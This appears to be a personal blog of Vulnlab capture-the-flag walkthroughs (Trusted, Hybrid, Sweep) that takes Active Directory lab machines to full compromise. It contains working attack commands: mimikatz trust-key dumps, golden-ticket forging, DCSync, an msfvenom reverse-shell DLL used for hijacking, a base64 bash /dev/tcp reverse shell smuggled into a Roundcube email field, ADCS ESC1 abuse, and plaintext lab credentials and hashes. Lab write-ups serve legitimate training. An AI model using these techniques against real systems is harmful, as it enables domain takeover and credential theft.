    * 6/26/2024 9:25:12 AM - CLEAR   - bd e0 30 b1 e3 5a 6f 28 d7 db 2d 12 f0 19 86 28 ee be df fa 8f 77 b0 7c 8a 82 05 e0 3f c0 85 81 2d 3a 45 eb 64 22 c6 e5 a3 e0 04 3f f8 fd 6d 59 d5 67 36 5d 32 f5 f2 01 3d 4a e9 29 91 c7 30 fa a4 a5 52 22 e6 17 09 c7 86 36 d7 ae 92 38 d2 7f 7a ec 7c 92 97 b6 e7 8f d3 59 74 97 31 70 8a 7d 88 11 29 e4 5c 0e ab b8 41 2a 35 39 68 f4 af 7b 01 bb 5c 6b a6 1d a6 2a d9 dc da 70 62 7e 75 c2 c4 95 9c 61 7c 98 b7 39 76 64 d6 d4 a3 9f fb f0 3c d7 76 d5 26 95 1b 96 e8 3f c2 a7 f2 99 9e 0a e9 b4 30 bf a9 6b 3a e1 ed 1e 33 17 70 43 41 d2 14 11 39 c8 d2 d5 41 54 24 f9 85 db 69 22 70 85 62 47 06 e3 2c 0a e1 bb 6e 8a 41 e8 09 1e e8 27 59 9e e7 14 d3 aa 3f 05 c3 6e 89 12 e7 cc 11 af 1a d9 a5 36 f8 2f e5 bb d5 d9 17 29 7d 11 d5 d5
    * aes256_hmac       87a58ba0eaa56e07d5eaadca5d5d043c64ef85efe9420279a98919d6d7b919f8
    * aes128_hmac       afe52545c051a7f537ea55d5abc96d31
    * rc4_hmac_nt       f3a4b4a5c1302b7da515ce596ad3281d

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 31 dd 12 7a 9e f6 47 94 cd 56 25 1b 58 e6 e3 53 f6 77 19 eb ac bf 4f 28 1a 2d 1e 60 3b 16 6a 94 f7 25 a3 2e 40 13 fb 3d bf a4 42 a2 b1 42 bd 64 89 d6 8a 72 91 a7 da 2d ba 83 1e 6c 25 af ef ec 8c 98 3a 67 ad 67 a1 d8 d9 55 f4 dd 23 bc 93 01 16 10 7e ef 64 84 a3 be 02 25 c8 a6 45 93 b4 e8 5c 27 ee 44 06 a7 81 a0 c2 8e 3c 99 32 2b 4e 5a 19 58 55 8c bb b3 c3 24 55 9f 49 da ba 08 65 1c 3d 3c 59 36 cf 0c fe 15 3c 56 60 c8 1b e1 dd 33 54 c4 dd e3 2a a5 20 bf 9d fe dc ff 9e 61 7b 15 08 d3 22 6b a1 71 2d 48 5e 40 3f 66 fb d2 c6 cc 0c d5 af f1 0d 65 3d 72 45 2a c2 2e d7 86 e3 e0 4f 59 c2 61 fc d2 de d1 87 66 4f f8 f6 ee a4 ed e5 3e df bc b5 86 3a 13 ba ee 39 cb 28 84 58 7d 8d 65 43 28 9b f2 b4 d0 69 99 d2 c1 37 d5 d6 45
    * aes256_hmac       3e09cb23acb863c8d23bf8d07eace010cb980d5cfbda991345e4a7cec5352ad7
    * aes128_hmac       01b6b1243a4a9b0ed26869f79ef1ae75
    * rc4_hmac_nt       4eba988516b0b0fcf99c8f1b10e552de

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92
    * aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
    * aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
    * rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74
    * aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
    * aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
    * rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0


mimikatz(commandline) # exit
Bye!

Next forge a ticket for enterprise domain admin

kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt

All that is left is to dump ntds from trusted.vl domain

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

We find

Credentials:

Object RDN           : Domain Controllers

** SAM ACCOUNT **

SAM Username         : Domain Controllers
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-516
Object Relative ID   : 516

Credentials:

Object RDN           : DomainDnsZones


Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db<REDACTED>72ef

Object RDN           : BCKUPKEY_0c265ae3-ef84-4900-9983-b1fbe71e738c Secret

And we we evil-winrm to the main dc

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u Administrator -H '15db<REDACTED>72ef' -i trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
trusted\administrator

.

Recommended path

use dnschef with bloodhound-python

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ dnschef --fakeip 10.10.158.230
          _                _          __  
         | | version 0.4  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
                   iphelix@thesprawl.org  

(18:52:27) [*] DNSChef started on interface: 127.0.0.1
(18:52:27) [*] Using the following nameservers: 8.8.8.8
(18:52:27) [*] Cooking all A replies to point to 10.10.158.230
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL.home
(18:52:54) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
(18:52:55) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ bloodhound-python -d 'LAB.TRUSTED.VL' -u 'rsmith' -p 'IHateEric2' -ns 127.0.0.1 -dc labdc.LAB.TRUSTED.VL -c all --zip
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 7 users
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 47 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labdc.lab.trusted.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20240624185341_bloodhound.zip

Bloodhound Analysis show rsmith can set password ewalters

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ rpcclient -U "rsmith" //10.10.192.230

Password for [WORKGROUP\rsmith]:IHateEric2
rpcclient $> setuserinfo2 ewalters 23 'Passw0rd123!'
rpcclient $> 

We can verify if the password is actually updated and we can login through WinRM

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ crackmapexec winrm 10.10.192.230 -u ewalters -p 'Puckiestyle@20242024' 
SMB         10.10.192.230   5985   LABDC            [*] Windows Server 2022 Build 20348 (name:LABDC) (domain:lab.trusted.vl)
HTTP        10.10.192.230   5985   LABDC            [*] http://10.10.192.230:5985/wsman
WINRM       10.10.192.230   5985   LABDC            [+] lab.trusted.vl\ewalters:Passw0rd123! (Pwn3d!

and evil-winrm in labdc

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u ewalters -p Passw0rd123! -i 10.10.192.230 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\ewalters\Documents> hostname
labdc
*Evil-WinRM* PS C:\Users\ewalters\Documents> 

.

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-smbserver -smb2support share .   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.192.230,59756)
[*] AUTHENTICATE_MESSAGE (\,LABDC)
[*] User LABDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> net use \\10.8.2.138\share
The command completed successfully.

*Evil-WinRM* PS C:\AVTest> copy .\KasperskyRemovalTool.exe \\10.8.2.138\share\KasperskyRemovalTool.exe
*Evil-WinRM* PS C:\AVTest> 

after examine KasperskyRemovalTool.exe with procmon on my windows box

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.138 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.138/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll 
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         6/27/2024   8:19 AM           9216 KasperskyRemovalToolENU.dll
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> 

After a couple of seconds we receive a shell as cpowers ( a domain admin)

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 2222 
listening on [any] 2222 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.192.230] 51759
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
lab\cpowers

C:\Windows\system32>

The below scheduled task was running as user cpowers every 1 min.

C:\Users\cpowers\Documents>type task.ps1
type task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"
C:\Users\cpowers\Documents>

That’s all

 

 

 

 

 

 

 

 

vulnlab-hybrid

vulnhub-hybrid

a medium Active-Directory chain

containing : one Ubuntu AD joined pc and a Windows DC

Tools used : keytabextract.py

NMAP enum

# Nmap 7.93 scan initiated Thu Jun 20 10:25:26 2024 as: nmap -Pn -sV -oN ports_hybrid1.txt 10.10.200.5
Nmap scan report for 10.10.200.5
Host is up (0.021s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-20 08:25:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:26:16 2024 -- 1 IP address (1 host up) scanned in 49.67 seconds

.

# Nmap 7.93 scan initiated Thu Jun 20 10:27:06 2024 as: nmap -Pn -sV -oN ports_hybrid2.txt 10.10.200.6
Nmap scan report for 10.10.200.6
Host is up (0.020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
143/tcp  open  imap     Dovecot imapd (Ubuntu)
587/tcp  open  smtp     Postfix smtpd
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:27:19 2024 -- 1 IP address (1 host up) scanned in 13.26 seconds

.

trough NFS enum we find

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

for the mailing part in roundcube i used

bash -i >& /dev/tcp/10.8.2.138/2222 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/hybrid]
bloodhound-python -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.200.5 --zip

Certipy-AD find vuln certs

┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 6FC0F9512195A183421AB786C3012BC6
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2123-06-17 14:14:39+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

we find ESC1 vuln for Domain Computers , I have a Domain joined MAIL01$ machine, enumerating more on MAIL01$, found /etc/krb5.keytab , a file which is used to authenticate to Kerberos without any human interaction or without storing the password.

Transferred the “krb5.keytab” file to my Kali machine and used  keytabextract.py to extract information about MAIL01$ and hashes.

python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458

 

Certipy

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.200.5" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'DC01.hybrid.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

.

┌──(puck㉿kali)-[~/vulnlab/hybrid]
evil-winrm -i hybrid.vl -u 'Administrator' -H '60<REDACTED>dc' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hybrid\administrator

 

 

vulnlab-sweep

vulnlab sweep

a medium windows machine

tools used : crackmapexec , bloodhound-python , sshesame , evil-winrm

nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Brute Force SMB

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
